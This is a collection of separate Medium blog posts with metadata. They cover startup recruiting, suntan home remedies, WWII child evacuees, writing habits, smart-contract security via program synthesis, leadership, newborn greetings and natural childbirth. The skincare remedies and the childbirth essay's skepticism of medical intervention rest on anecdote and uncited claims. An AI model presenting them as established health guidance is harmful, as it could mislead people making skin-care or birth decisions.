Today we will start a journey on recruiting. How many writers, how many business leaders are telling us that recruiting is THE most important thing to help your business performance.
Don’t miss out on the next episodes and signup for the newsletter following that link
Two years ago I had not hired anybody in my life, yet I needed to build my teams. That’s how I jumped into the pool of recruitment. I was not ready for this.
Recruiting is extremely time-consuming and complex, because so much of the process depends on interpretation.
Designing an effortless recruiting process has been fun, and it enabled me to save time and select great candidates from a pool of over 200 people, averaging two interviews each.
At the end of this article you’ll have a grasp of the building blocks necessary to have an effective recruiting pipe.
Here is what you’ll find in today’s article:
How to use recruiting agencies
Build an effortless recruiting process
Get your team involved
Take It Easy With Recruiting Agencies
Recruiting agencies appear like the savior when you have no idea how to recruit. Honestly they have had a bitter sweet taste for me, and in hindsight I do not believe that you should use them when you have an early stage company.
They will help you to find candidates, but the price to pay is high and it will still be your responsibility to select the right person. There’s no shortcut for this.
Even though most of them are rewarded on success fees, if somehow things do not work out with the candidate, you find yourself locked in with the recruiter holding your cash.
Now, candidate is gone, cash is gone and you can only hope the recruiter will introduce you with better ones. If you fill in the position by any other means your cash is lost. It is not an ideal position to be in.
It’s no secret that in the first years of your young company you’ll have to iterate a lot, and recruiting is part of the iteration. Try to keep recruiting in-house as long as you can. It might save you a couple of thousand euros.
Nevertheless a possible alternative if you want to save some time is to use recruiters specialized in the sourcing of candidates while keeping the selection process under your control.
Now the fun begins! There is no shortcut: you need a good recruiting process.
The Building Blocks Of Recruiting
How do you start if you don’t have any idea how recruiting is done? As usual, you’ll find help in books and articles. The main source of information for the recruiting process I have designed has been the book “Who”.
This book has helped me understand the key building blocks of an effective recruiting process and I wanted to share them with you. The method is separated into 4 sections:
1. Scorecard — Job description on steroids
The scorecard is a more elaborated job description composed of four main pillars:
The mission: why the job exists
The outcomes: how performance will be assessed
The competencies: how to match the role, the culture and the candidate’s skillset
The alignment: ensure that the job matches expectations with other roles within the company
2. Source — Spread the word
You will use mainly three ways to source candidates:
Referrals: thanks to current employees, and your first- or second-circle network
Recruiters: responsible for a large scope, from sourcing to selecting candidates
Researchers: responsible for the sourcing part of the recruiting process
Recruiters and researchers can have a variable scope based on what you want to keep internalized or outsourced. More on that in future articles.
3. Select — There can only be one
You have a scorecard, you have candidates. Now the show must go on. A good recruiting process is composed of four types of interviews:
Screening interview: check the fit of values and the candidate’s interest
Who interview: dig deep into the candidate’s achievements and previous experiences
Focused interview: develop a specific part of the candidate’s experience where you need more insight. It is a good opportunity to include your team members in the process.
Reference interview: have a chat with the candidate’s references, and cross-check facts and information, looking for red flags.
You might also want to add an extra step, which is why I added the:
Skills and Test interview. The goal of this interview is to test the motivation of the candidate, the skills and the mindset.
You can substitute it for the focused interview if the process becomes too long, or add it between the Screening and Who interviews.
No need to mention that you might adapt the process based on the seniority of the candidate. You won’t have the same criteria and process if you hire an intern, a salesperson or a CTO.
4. Sell — Bring it home
It doesn’t stop there, because even though you have selected someone, you need more than ever to continue selling your company and the project you want the candidate to be onboarded on.
Now would be a terrible time to lose the chosen candidate after all the efforts you’ve made to reach the end of the process.
Do not let the chance slip, and keep a close relationship with the chosen candidates until they are onboarded in your company. Stay in touch with them and make sure to prepare for their arrival beforehand.
Involve Your Teammates In The Process
Even though you might be responsible for most of the recruiting process (especially for smaller companies), it is important to have your teammates involved in the process design and (ideally) in the interviews.
It has two benefits:
Help to identify red flags and cut candidates based on complementary points of view
Build diverse selection criteria, drawing on every participant in the process. Eventually it will help to find a better fit with the company’s culture.
If you had no idea how to build a recruiting pipe, now you are all set to go with this framework.
There are many ways we can go from there and we will have a look at them in the next episodes.
If you don’t want to miss them, sign up by following that link!
Upcoming episodes
The next episodes will be digging deeper into each step of the way to help you implement the method.
The Scorecard
The Screening Interview
Sign up here to get it delivered to your mailbox 📬
The Try Angles newsletter is delivered to you every two weeks on business and self-development topics.
Resources
Who — A method for hiring — Geoff Smart and Randy Street
That’s it for this weekly review I hope you’ve enjoyed it.
Thanks for reading and until next time!
Cheers,
Franck ⏅
|
https://medium.com/@franck-nussbaumer/the-4-pillars-of-recruiting-c77b1cb2a82c
|
['Franck Nussbaumer']
|
2020-11-11 09:00:51.748000+00:00
|
['Recruiting', 'Startup', 'Recruitment', 'Process', 'Hiring']
|
Home Remedies To Remove Suntan Naturally:-
|
1. Sandalwood Powder:-
Take 2 tbsp of sandalwood powder +2 tbsp of rose water. Mix both of the ingredients to make a thin paste. Then apply the pack all over the face and neck area. Leave it for 15 minutes and wash it with cold water. You can use this pack twice a week to see the best result.
Sandalwood powder can fight acne-causing bacteria, exfoliate the skin and helps to remove suntan. Rosewater helps to lighten skin pigmentation and it helps to maintain skin PH balance and also controls excess oil.
2. Lemon Juice and Honey:-
Take 2 tbsp of lemon juice + 1 tbsp of honey. Mix the ingredients thoroughly. Apply the pack onto your face, leave it for 30 minutes and wash off.
Lemon juice has a bleaching property that is effective in removing suntan. Honey keeps the skin soft.
3. Gram Flour and Turmeric Powder:-
Take 1 tbsp of gram flour (besan) + 1 tbsp of turmeric powder. Mix both the ingredients using water to make a thin paste. Apply this onto your face and neck area. Leave it for 15 minutes, then wash it off with cold water.
Turmeric powder helps to brighten your skin and gram flour helps to exfoliate the dead skin and removes tan.
4. Multani Mitti and Rose Water:-
Take 1 tbsp of Multani mitti+ 1 tbsp of rose water. Mix the ingredients and apply it on to your face and leave it for 10 minutes.
Multani mitti cools and soothes sunburns. It also removes tan and makes your skin radiant.
|
https://medium.com/@rani-lipsasahu/home-remedies-to-remove-suntan-naturally-3c0e1a9e86d6
|
['Rani Lipsasahu']
|
2020-02-20 17:35:29.798000+00:00
|
['Home Remedies', 'Beauty Tips', 'Skincare']
|
War Brings Ethical Dilemmas into Sharp Relief.
|
It is a little easier to consider ethical dilemmas concerning children if one always takes the position that the best interests and health of the child are primary. One will then be well served in whatever decision one makes. We could go down the list of participants in this sad story, and ask ourselves, “did this individual/system/administration have the best interests of these children at heart when they made their decisions?” If the Finnish parents and government had not sent the children to Sweden (and other places), what’s the likelihood that many of them wouldn’t have survived the war, or lost their parents, or faced grave hardships? Would any of them have reached the age where they might have been pressed into military service, and would have possibly killed or have been killed?
Yes, these children were sadly separated from their families and their country, but they were moved to a safer environment that avoided war due to neutrality, and were placed with families that had resources to take care of them, and wanted to take care of them. Having lived there for years, perhaps barely remembering their original language, or even their original families, is it ethical to force them to return to their birth country? What if the child is 12 years of age, and states clearly that they consider the Swedish adults their parents, and that they want to stay and not return to Finland? If the child has reached “the age of reason,” what rights does s/he have to make those decisions for themselves? Shouldn’t their birthparents have understood that there would be a risk that they would never see their children again if they sent them away? Were they forced to send their children away, like the native people of Canada had to do, because of a racist government policy of forced child separation and encampment of Indian children in residential schools, or did the Finns choose to send them, even if for only caring motivations? Is it ethical to demand that children return, often to a much less healthy and nurturing environment, when a child clearly states that they do not want to return, and would be retraumatized should they have to return?
|
https://medium.com/@patrickinca1/war-brings-ethical-dilemmas-into-sharp-relief-aea8fa9caebe
|
['Patrick O Hearn']
|
2020-11-07 21:52:09.788000+00:00
|
['Ethics', 'Finland', 'Displacement', 'World War II', 'Trauma']
|
What if you have no motivation to write?
|
Photo by Nick Fewings on Unsplash
I’ve seen people bring this up as a struggle a few times: “I’m just not motivated to write.” And I’ve been there too. You found this thing you love doing, so why aren’t you doing it all the time?
I’ve got two thoughts on this:
1. I have no motivation to work out. I mean, I hate working out. But I’m also 40+ and my metabolism isn’t doing the heavy lifting it used to do, so I need to work out. So here’s what I did: I started small and I created a daily habit. Alexa has a “7-minute workout” program that I started doing just 3 days a week. Now, I know that sounds like it would make zero difference, and maybe I’m not gonna lose any weight from that, but what I am doing is establishing a habit. You start small and build up. And here’s what I’ve found: the more I do it, the more I enjoy it, the more motivated I am to do it. I even have an app that tracks my habits so I can go back and see my progress and that also gives me more motivation. So set yourself a small goal, keep track of it, and see if that doesn’t increase your motivation over time.
2. If you start dating someone and you find yourself with no motivation to hang out with them, it’s probably time to start dating someone else. For a writer, that might mean that the story you are working on is not the story you need to be writing right now. You should be so thrilled to sit down and knock out that story every time you sit down to write. It should be a love affair. If you’re not “feeling it” it’s okay to break up with that story and move on to one you are passionate about.
I will say that these two things (habits and passion) get easier the more you practice them. These writing habits start to become less of a chore as you go, and just like dating, you start to recognize what you like or don’t like in a story the more you “write around.”
So it’s gonna be hard at first. It’s gonna be a lot of false starts and a lot of giving up and coming back. But that’s okay. It’s all part of the process as you discover yourself as a writer.
What about you guys? Got any tips for increasing your motivation to write?
|
https://medium.com/scriptblast/what-if-you-have-no-motivation-to-write-b0b1006f8955
|
['Hudson Phillips']
|
2020-11-16 11:02:13.080000+00:00
|
['Writing', 'Screenwriting', 'Filmmaking', 'Scriptblast', 'Screenplay']
|
Program Synthesis — Smart Contract Security 101
|
After reading this post you’ll know about smart contract security, an application of Program Synthesis developed by Synthetic Minds, and the prospects of this industry. My previous post describes in detail what Program Synthesis is and why you should care.
To recap the first post — Program Synthesis allows developers to create programs that in turn create other programs. The promise is very appealing, but there are challenges that limit the applicability of Program Synthesis. One way forward is to find problems where Program Synthesis adds significant business value. One such problem is smart contract security.
Smart Contracts
You have probably heard about blockchain technology — distributed systems technology that allows participating entities to transact with each other without a central authority. Without going into details, the main breakthrough of this technology is that participants do not have to trust each other in order to transact. The validity of actions is supported by math, encryption, and economic incentives. One of the most promising features within many blockchains is “smart contracts”. Smart contracts are perpetually running programs, i.e., apps, providing services independent of any controlling entity.
Smart contracts are de-facto computing scripts, written in Ethereum Virtual Machine (EVM) code or higher languages built on top of EVM, and typically implement specific functionality. For instance, a distributed computing platform on blockchain, such as Golem or Sonm, is a smart contract that governs the distribution of computation power for those who need it and rewards the sharers. Many things, from a small reminder app to a platform such as AWS, can theoretically be built as a smart contract.
A generic representation of how should a smart contract work in an ideal case by Atul Mehta
In the most simplified case (permissionless blockchain, all-digital assets, etc) smart contracts have clear advantages. Because, IF properly developed, they are:
Self-executable – smart contracts can be triggered by events, e.g., “IF event X happens, THEN do Y”. For instance, for a decentralized stock exchange: “If I send money to a certain account, then change the owner of a certain stock to my name”. This might have some challenges if an external data provider is involved, but ideally all data would be trustless and can sit on the blockchain. In this case, self-execution ensures that contracts execute independently of any third parties, i.e., the stock exchange in the case above.
Unequivocal – since the set of IF and THEN statements is clearly defined and encoded in the software, there should be no ambiguity about what happens when.
Immutable – once the contract is deployed on the network, it cannot be changed. An exceptional case is when the underlying blockchain hard-forks, in which the majority of network participants agree to implement a change.
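The “IF event X happens, THEN do Y” behavior can be made concrete with a toy model. The sketch below is plain Python rather than EVM code, and every name and amount in it is illustrative, not taken from any real contract: a payment event atomically triggers the ownership transfer, and a one-shot `settled` flag mimics the fact that an executed transfer cannot be undone.

```python
# Toy model of a self-executing "IF payment received THEN transfer ownership"
# contract. Python stand-in for EVM code; names and amounts are illustrative.

class StockEscrow:
    def __init__(self, stock_id, seller, price):
        self.stock_id = stock_id
        self.owner = seller      # current owner of the stock
        self.price = price       # asking price
        self.settled = False     # the contract may execute exactly once

    def pay(self, buyer, amount):
        """IF the full price is received, THEN ownership changes atomically."""
        if self.settled:
            raise RuntimeError("contract already executed")
        if amount < self.price:
            raise ValueError("insufficient payment")
        self.owner = buyer       # the THEN branch: ownership transfer
        self.settled = True      # immutability of the outcome

escrow = StockEscrow("ACME-42", seller="alice", price=100)
escrow.pay("bob", 100)
print(escrow.owner)  # -> bob
```

Because the trigger and the effect live in the same atomic step, there is no third party (the stock exchange in the example above) whose cooperation the buyer has to trust.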
The main challenge is that big and bold “IF properly developed”. One part of this challenge is that it is a “contract”. There should be clear business logic. Sometimes it is not trivial to design a contract that accounts for all possibilities. But the other part of the challenge is that it is “smart”, meaning that it is a program and therefore it brings a whole layer of digital security requirements.
The bugs in smart contracts of popular systems such as DAO and Parity (1st and 2nd attacks) alone led to more than $350m being stolen or frozen. Also, with smart contracts, because their executions are immutable, money can just become stuck and inaccessible, as has happened in the past.
Smart contract security
Software developers have been testing their software in different forms for years. So a natural question is–if smart contracts are pieces of software, why do we need a specific solution for smart contract security? Wouldn’t regular software testing suffice? There are a few things that differentiate software development from smart contract development.
1. Smart contract code is permanent. The modern software development practices such as CI/CD allow developers to release updates almost on a daily basis. Smart contract execution is immutable, and a developer cannot just release a patch to fix bugs. Theoretically, it is possible to have the entire network come to consensus about reverting, but it is a huge pain. For instance, the DAO held 14% of all ether when it crashed, motivating the Ethereum community to hard-fork. In the non-blockchain world, the analogy is to think about asking Amazon to change AWS’ underlying infrastructure to fix bugs in a customer’s cloud machines. Thus, the software development philosophy of continuous improvements is not entirely applicable to smart contract development.
2. Smart contracts’ code is public. In traditional software, customers only see the user-facing elements of applications and therefore have a limited-to-no understanding of the internal structure of the software. The deployed code for smart contracts is publicly visible, allowing decentralized execution. But this also adds more capabilities to hackers, as they have more information to find and exploit vulnerabilities. For many smart contracts, in addition to the deployed code, the source code is also public. Of course, open source is not a blockchain-specific phenomenon, as many traditional products from Linux to Drupal are open-sourced. In contrast to those mature systems, standards and best practices are still being developed in this nascent domain, alongside the additional moving target of development happening at the infrastructure layer.
3. A high value of dollars at risk per line of code ($/LOC). The DAO was about 1200 lines of code, and this is an average-size smart contract. The DAO breach was pegged at $180m lost, which represents $150k per line of code. Compared to non-blockchain software (e.g., Intuit Quickbooks is 10 million lines of code) the value of assets per line of code differs by orders of magnitude, and therefore smart contracts require much more stringent security checks.
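The dollars-per-line figure is simple arithmetic on the numbers quoted above, which can be sanity-checked directly:

```python
# Back-of-the-envelope check of the $/LOC figure quoted for the DAO breach.
dao_loss_usd = 180_000_000  # value pegged as lost in the DAO attack
dao_loc = 1_200             # approximate size of the DAO's smart contract
print(dao_loss_usd // dao_loc)  # -> 150000, i.e., $150k at risk per line
```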
Companies addressing smart contract security
Within the last 3 weeks, I have spoken to 16 companies from a broad range of industries, from a security token platform in the US to a marketplace for classified goods in Singapore. There was unanimous agreement about the need and desire for smart contract security, but the reasons and methods differed from company to company.
There are two main ways companies go about smart contract security — use security tools internally or hire audit firms. Most companies that I spoke to used some combination of both.
Security tools. There are a plethora of tools that developers can use internally to check the security of developed smart contracts. The frequency of checks might range from every major build to every major release, based on the complexity of smart contracts and needs. These tools are mostly open-sourced. The main tools that frequently came up in conversations are Mythril.ai, Securify, Oyente, QuantStamp (marketplace), KLab, Trail-of-bits, Octopus, and Solidified. A common thread across these tools is that they check for known vulnerabilities. Depending on the method this might be more or less sufficient, but it is definitely not the ultimate security companies want. The output of such tools is usually the type of mistake and the line where it occurs. Companies frequently complain about the high level of false positives. False positives arise due to over-approximating the check against known patterns of bugs and not considering the intent, amongst other issues.
Audit firms. A gold standard in the blockchain industry is to hire auditors that do the code review. These firms might be: 1) smart-contract-security-specific companies such as Hosho, 2) traditional big houses such as EY, or 3) blockchain-native enterprises such as Consensys. Besides the focused audit, the main value that customers get is a stamp of approval, i.e., an audit certificate, that augments the code’s credibility. One of the clients I talked to was struck by the fact that, in the case of a breach, audit firms bear little responsibility other than reputational risk. The financial burden lies with the developers. The result of the audit is usually a report that describes discovered flaws and classifies them by severity. Both DAO and Parity had (allegedly) passed audits before the attacks happened.
What about a different approach?
All companies that I talked to use at least some security tools. These tools are useful, but the tools do not understand the meaning and semantics of the code in sufficient depth. Hence the need for an expert in smart contract security to review the output of the tools. Very few companies have such experts in-house, and that is why audit firms thrive. Moreover, audit firms’ employees have seen hundreds of different cases and can conduct tests that are scoped a bit beyond known bugs. But still, it is not the authoritative security that companies desire. What if we had another method that combined the best of both worlds and did automated end-to-end verification exploring the attack space?
End-to-end verification for general software is close to intractable, and very hard without extensive annotations. However, smart contracts run within a restricted execution environment, e.g., the EVM. This makes their verification/synthesis tractable. Even with upcoming blockchain scaling solutions, smart contract executions will always be restricted. The reason is slightly technical, but it has to do with the fact that the stability of the entire network, i.e., the ability of miners to make progress, would be in question without restrictions. What this means is that the property that makes smart contracts possible on the blockchain, i.e., truncated executions using gas limits or similar techniques, also enables proofs about them.
Synthetic Minds
I spent this winter at Synthetic Minds as employee #2. This is a YC company that raised $5.5m from Khosla Ventures and uses Program Synthesis to provide a managed service for smart contract security. In a nutshell, Synthetic Minds’ product is able to automatically read smart contract code, understand it, and then explore the space of potential attacks, both known and unknown. Moreover, using Program Synthesis the system synthesizes the attacker’s code to allow customers to understand and examine how vulnerabilities might be exploited. Smart contract security is a vivid example of an area where Program Synthesis might solve the problem better and in a much more usable way than with other means.
As a side note, Synthetic Minds’ way of doing synthesis is different from the baseline CEGIS described in Post 1.
High-level schema of Synthetic Minds’ approach to smart contract security
As with any application of Program Synthesis, writing specifications for the smart contract’s functionality might be complex. The insight here is that specifications become simpler when written assuming an adversary. For instance: “don’t leak balance”, “keep user metadata disjoint”, “non-admins cannot update identities” can be stated in simpler ways by describing what the attacker can and cannot do. Once these requirements are stated, the automated system proves whether the conditions are met, or, if they are not (= a bug), it synthesizes an adversary’s code. Such a method yields significant business advantages:
Higher confidence, because the system explores potential attackers, including those that we don’t yet know. With such verification, companies get guarantees which they don’t get with testing/auditing.
Little manual work to start: the system doesn’t require specifications for each function and instead does end-to-end verification.
Explicit attacker’s code as output, rather than a set of functions and labels in the code. Possible exploit scenarios allow developers to speed up the debugging process, and can be used as future test cases.
Fewer false positives, which helps developers focus on the important issues.
The system takes as input a smart contract in Solidity and either 1) assertions in the code or 2) plain English description of the properties e.g. “keep metadata disjoint” (which the Synthetic Minds team converts into assertions). Source languages besides Solidity will be added soon.
Geeky stuff or where is Program Synthesis?
Under the hood, the system works as follows. For every smart contract A and a number of properties (x, y, z), Synthetic Minds creates a generic user X that is given access to the functions within A. The system then uses symbolic execution over unknown programs to automatically analyze A across potential transactions and time. It then produces a number of theorems and proves them using the Z3 theorem prover.
This solution explores the attack space and evaluates to either 1) “no violation”, in which case it generates an independently (machine-) checkable proof-certificate, or 2) synthesized code for an adversary. Synthetic Minds’ solution looks for property conformance from first principles, rather than checking against past exploits. This is one of the major differences from other solutions. If there are no flaws, then Synthetic Minds produces a proof-certificate that companies can independently verify. The proof-certificate is mechanically checkable, and not just a PDF.
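To make “explore the attack space and synthesize the adversary” concrete, here is a deliberately tiny sketch in plain Python. This is not how Synthetic Minds actually works — their system reasons symbolically and proves theorems with Z3 rather than brute-forcing, and every name below is made up for illustration — but it shows the shape of the idea: enumerate short call sequences by a generic user against a buggy toy contract, check an adversarial invariant after every call, and report the first violating sequence as the “synthesized attack”.

```python
from itertools import product

class Vault:
    """Toy 'contract' with a classic bug: withdraw pays out without debiting."""
    def __init__(self):
        self.balances = {}   # what each user is owed
        self.pot = 0         # funds the contract actually holds

    def deposit(self, user, amt):
        self.balances[user] = self.balances.get(user, 0) + amt
        self.pot += amt

    def withdraw(self, user, amt):
        if self.balances.get(user, 0) >= amt:
            self.pot -= amt  # BUG: forgot `self.balances[user] -= amt`

def invariant(v):
    # Adversarial spec in the spirit of "don't leak balance": the funds
    # held must always cover what users are collectively owed.
    return v.pot == sum(v.balances.values())

# The generic user X and the calls it may make (the "attack alphabet").
ACTIONS = [("deposit", ("mallory", 1)), ("withdraw", ("mallory", 1))]

def find_attack(max_len=3):
    """Brute-force stand-in for symbolic search: return the shortest call
    sequence that drives the contract into an invariant-violating state."""
    for n in range(1, max_len + 1):
        for seq in product(ACTIONS, repeat=n):
            v = Vault()
            for i, (name, args) in enumerate(seq):
                getattr(v, name)(*args)
                if not invariant(v):
                    # The "synthesized adversary": the violating call trace.
                    return [f"{nm}{a}" for nm, a in seq[:i + 1]]
    return None  # no violation found up to max_len (evidence, not a proof)

print(find_attack())  # -> deposit then withdraw exposes the missing debit
```

A real verifier replaces the enumeration with symbolic reasoning over all users, arguments, and sequence lengths, which is why a “no violation” result can come with a machine-checkable proof instead of mere bounded evidence.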
What’s next?
Program Synthesis is a very exciting space that has a huge potential to change not only specific applications such as smart contract security but the whole Software Development industry. For instance, another problem that Program Synthesis could solve is the scarcity of blockchain-focused software developers. From late 2017 to late 2018 the number of openings for blockchain-skilled developers rose by 400% to 12,000+. Moreover, the salaries are higher by an average of 10%–20% versus non-blockchain fields. Use of Program Synthesis could not only augment blockchain developers but also give capabilities of smart contract development to people without coding skills.
But even outside of blockchain there are a plethora of opportunities for Program Synthesis. Many applications from the pricing of derivatives to the training of robots are being tackled. I am sure that in the next years we’ll see many great products released by Synthetic Minds and other emerging companies in the space.
|
https://medium.com/@vidiborskiy/program-synthesis-smart-contract-security-101-d708002b2198
|
['Alexander Vidiborskiy']
|
2019-02-01 01:26:17.814000+00:00
|
['Program Synthesis', 'Synthetic Minds', 'Smart Contracts', 'Security', 'Blockchain']
|
Leadership Skill — Two Ways Perspective in Leadership — How to be a middle manager in your company
|
Hi reader, let me introduce myself. My name is Marcello, working as a full-time entrepreneur. Right now, I lead 2 companies named Livera & Chameleon who consist of total employee more than 15 people. It’s still a small company but I believe that the company will be bigger than now and realize my vision. I am very excited to talk about leadership, business, & management. That’s why I create my Medium to discuss more that topic.
I will start with the “Leadership” topic. In this article, I will start with “two ways perspective in leadership skill”. Sometimes as a human, we take sides with something that we hear from another person that closes with us. We judge something because everyone blames it, are you the one who does that too in your life?
In my humble opinion, as a leader, we need to see 2 perspectives of every case that we face. Let’s discuss the simplest thing that we face every day in work-life.
As an employee, we always think about how hard our tasks are. Maybe we even say that our boss does not work as hard as we do. The employee thinks that their boss is not doing anything and just enjoys the “result” of the employee’s job.
In the meantime, as a c-level or management, we always think about how hard our task is. Always demand the employee to improve the performance and create a bigger impact for the company. The boss thinks that their employee enjoys their life and not doing anything right in the daily work life (maybe not all leader/boss like this).
This is simple but very impactful for a leader, and for a middle manager in a company who connects the employees and the c-level. They need to know each other’s responsibilities and work toward the same vision (that’s why we need the vision & mission the first time we create a company).
Okay, let’s break down the case. The problem in this case is that they don’t know each other’s responsibilities. As a leader, we need to stay between them and not take sides with anyone (neither the c-level/management nor the employees).
From the employee side, they need to know the management’s pain: the need to look for investment for business growth, employee well-being, the responsibility to improve their own skills and employees’ skills, career paths in the company they have created, cash flow, and a lot of other problems in management’s head. The truth is that the employee doesn’t need to think about all of that; the employee needs to work and think about achieving a better result. The employee doesn’t need to think about everything that the management thinks about.
From the management side, they need to know the employee’s pain: the need to run their life, pay the bills, keep a work-life balance, and the other things that employees need.
From this perspective, we can see that no one is wrong and no one is right. The only thing is about having two perspectives and empathy for each other. The management needs to think about their employee and create a good work ecosystem with a work-life balance. In the meantime, the employee needs to know the struggle of the management to keep improve and innovate to make the company run. With this balance, the “wheel” of the cart named “Company” will always move and create a better future for everyone inside the company.
|
https://medium.com/@mjudhandoyo/leadership-skill-two-ways-perspective-in-leadership-how-to-be-a-middle-manager-in-your-company-dc3fd89caaf0
|
['Marcello Judhandoyo']
|
2021-09-07 16:17:22.766000+00:00
|
['Entrepreneurship', 'Startup Lessons', 'Leadership Skills', 'Leadership', 'Startup Life']
|
Congratulate The New Parents With These Newborn Baby Wishes!
|
Wondering about what to write or how to congratulate the parents of the newborns? Here are a few quotes and messages that we have compiled to make your task easier. Give your newborn a perfect welcome with these heartwarming baby wishes!
It is finally time to show your excitement and happiness at the arrival of the newborn into the family and also send your good wishes and prayers for the adorable babies.
1. Wishes for triplets
“Congratulations on the arrival of 3 new lives! May these lives be filled with love and peace. May your precious baby bring lots of joy to your family! Lots of love and warm wishes for your future.” “Babies are wonders, babies are fun, congratulations on your three new little ones!” “Born with buddies — how fun is that? Congrats on your triplets.”
2. Baby wishes for twins
“Having twins is like setting up a new business — double the hard work in the beginning, but double the return as the years go by. Congratulations.” “You have more than one reason to celebrate. God has blessed you with two bundles of fun. Congratulations.” “Forget all the happy memories of the life that you’ve had so far. As compared to being parents to twins, nothing comes at par. Congratulations.”
3. Newborn baby wishes for a girl
“Warmest congratulations on the birth of your cutest baby girl!” “A baby girl promises to love her father and respect her mother! Cannot wait to meet this little bundle of joy! All the best for the future.” “We can’t wait to see the many ways God blesses you with this little one.”
4. Wishes for baby boy
|
https://medium.com/@BookEventz.com/congratulate-the-new-parents-with-these-newborn-baby-wishes-b6e13e143584
|
[]
|
2020-05-05 07:10:02.161000+00:00
|
['Newborn', 'Baby Photos', 'Wishes', 'Baby', 'Parenting']
|
Are We Being Ripped Off With Over-Medicalised Births?
|
Can giving birth be an ecstatic, rather than a traumatic and disempowering, experience?
I am writing this on the morning of the ‘due date’ (or shall we say ‘guess date’) of my second child. I am in eager anticipation, not just of finally meeting my new baby and holding her in my arms, but of the actual birthing process itself. I rarely tell anyone this but my first words after giving birth to my son, naturally at home three years ago, were ‘I want to do it again!’ I meant giving birth itself, not just the end result of it.
Was it quick? No. Was it easy? No! It was the most challenging, intense experience of my life and there were both sweat and tears, but it was also the most rewarding, magical, empowering, and life changing event — not just because I ended up with the new love of my life in my arms. It was the experience of giving birth itself that was ecstatic. Unaltered, undisturbed and completely primal. I was at home, in my safe space, with my few chosen people to relentlessly support and nurture me. I had the most soothing beautiful music I’d chosen, candles, essential oils, and lots and lots of love and tenderness surrounding me. The birth unfolded beautifully with the help of all that. Yet, it wasn’t just these factors which made it so special.
A rite of passage
After my son was born, I was naturally high from the actual birthing experience for months. I thought about it every single day, with euphoric awe. The best I can describe it as, is a rite of passage that prepared me for my new life as a mother. (And I had always been told by various doctors that I couldn’t get pregnant naturally, if at all… but that is another story!)
So why has birth become such a pain, a ‘necessary evil’ — sometimes so much so that we would rather have invasive and risky abdominal surgery just to avoid having to go through it? (Without taking away from the fact that sometimes, though much less frequently than performed, surgery is indeed necessary.) Why have we come to believe that giving birth is a medical emergency, rather than a natural process that the body knows how to carry out quite effectively? This is a trick question, for the question is also the answer: because the belief that birth is a painful medical event that needs to be managed and controlled with medical procedures, has made it a reality! It is the very mistrust in our own bodies, the expectation of pain, difficulty, and complications and the presence of excessive monitoring that brings about the need for more interventions. How?
Expectations
A few generations ago, birthing was a family event. It happened most often at home (in my country of origin, Finland, usually in the sauna). There were other mothers, grandmothers, and perhaps older siblings present — the nearest and dearest womenfolk to support the birthing mother. Perhaps a midwife if one was lucky. Most women, by the time they were giving birth themselves, would have already witnessed a natural birth.
Most of what we hear from each other and see in the movies and on TV these days is pain and agony. I remember seeing a video in primary school of a woman giving birth, and I still remember that woman lying on her back in stirrups, screaming with a twisted face and her jaw clenched with tension, with a male doctor next to her telling her to push. It looked like the opposite of empowering, magical, and joyful. It seemed more like humiliation and torture! The sad thing is that this is what most of us these days have come to expect.
The fear-tension-pain syndrome
It is the fear and expectation of pain that produce excessive amounts of true pain because of the pathological tension it creates in the physical body. This is called the Fear-Tension-Pain Syndrome (FTPS). When this vicious cycle is established, it creates a crescendo of events which are experienced as true pain, which justify more fear and stronger resistance, which contribute to even more pain and more difficult labour… “The most important contributory cause of pain in otherwise normal labour is fear.” [Read.G.D.]
This doesn’t mean that the pain women experience during labour isn’t real. Quite the contrary: it is very real indeed. But it doesn’t have to be so! Our body is beautifully designed to create nothing less than a mind-blowing cocktail of hormones that can help us experience intensity, even ecstasy, instead of pain.
Better than all the drugs on the planet
These hormones can see us through normal childbirth without pharmaceutical drugs, which have a not-so-great effect on the body’s natural processes (in the same kind of way that the anaesthetic a dentist applies to your mouth affects your ability to speak, eat or drink normally) and which also end up in the baby, thus affecting the bonding process and the establishment of breastfeeding.
But in order for these incredible hormones, namely oxytocin (the ‘love hormone’), endorphins (natural opiates and analgesics, hormones of pleasure and transcendence) and prolactin (the hormone of mothering and surrender), to exist at the required peak levels to make the labour smooth and enjoyable, the woman needs to feel private, safe and unobserved. When adrenalin and noradrenalin (the fight-or-flight hormones, also needed in the later stages of birth) kick in too early, they reduce the production of the ‘feel good’ hormones and significantly reduce blood flow to the uterus and placenta. This can cause adverse fetal heart rates and more fetal distress. Stress-induced adrenaline (for example, if the woman feels disturbed in her environment or is under time pressure) can stall and stop the whole birth process. This often triggers a cascade of interventions.
The ‘Law of the sphincter’
Labouring attached to machinery or IVs that restrict our movements, under bright lights and observation by people we barely know (in the worst case scenario, people we have never met before), having frequent internal checks performed, who can feel private and unobserved? Again, sometimes they are necessary, but in most low-risk births they are not. It is often the very things that are supposed to protect us from the dangers of childbirth that actually make it more complicated, painful and difficult. How? Can you imagine trying to do a number two on the toilet, with bright lighting and having your nether regions observed by strangers who are timing and measuring your progress, giving you a deadline by when you need to have finished your business?! Ok, point made, but what does having a poo have to do with giving birth, you may ask…
Ina Mae Gaskin, the most famous midwife and childbirth educator of all times, refers to it as the ‘Sphincter Law’:
Sphincter muscles of both anus and vagina do not respond on command. Sphincter muscles open more easily in a comfortable, intimate atmosphere where a woman feels safe. The muscles are more likely to open if the woman feels positive about herself; where she feels inspired and enjoys the birth process. Sphincter muscles may suddenly close even if they have already dilated, if the woman feels threatened in any way.
Medical support
Of course there are times when medical intervention is required and when it saves the lives of babies and mothers. We are lucky to have access to advanced medical support when we need it. And many women indeed feel safest giving birth in a hospital, which makes it the best place for them to birth. But all too often, the current medical model is simply in the way of the natural process because of strict hospital policies, time limits and protocol, which feed the lack of belief in the body’s capability to do it on its own. One intervention leads to another, and birth easily becomes a traumatic medical event where women feel at the mercy of the hospital staff and procedures. Perhaps the medical model could better support the natural ability of a woman to give birth and apply the principle of ‘leaving well alone.’
What can we do?
The best thing we can do as women is to educate ourselves on the physiological processes of the birth and of the pros and cons of different interventions in different situations. This way, we can approach birth without unnecessary fear and make educated choices for ourselves and our babies. It is necessary to remember that we always have a choice to decline any procedure that we consider unnecessary — even if the hospital staff make it sound like we don’t.
-We can practise inducing the relaxation response in the mind and body through guided relaxation and breathing exercises. This helps keep muscle tension to a minimum, allowing the body to birth in the optimal way.
-We can eat well and exercise during pregnancy to be fit and healthy for birth.
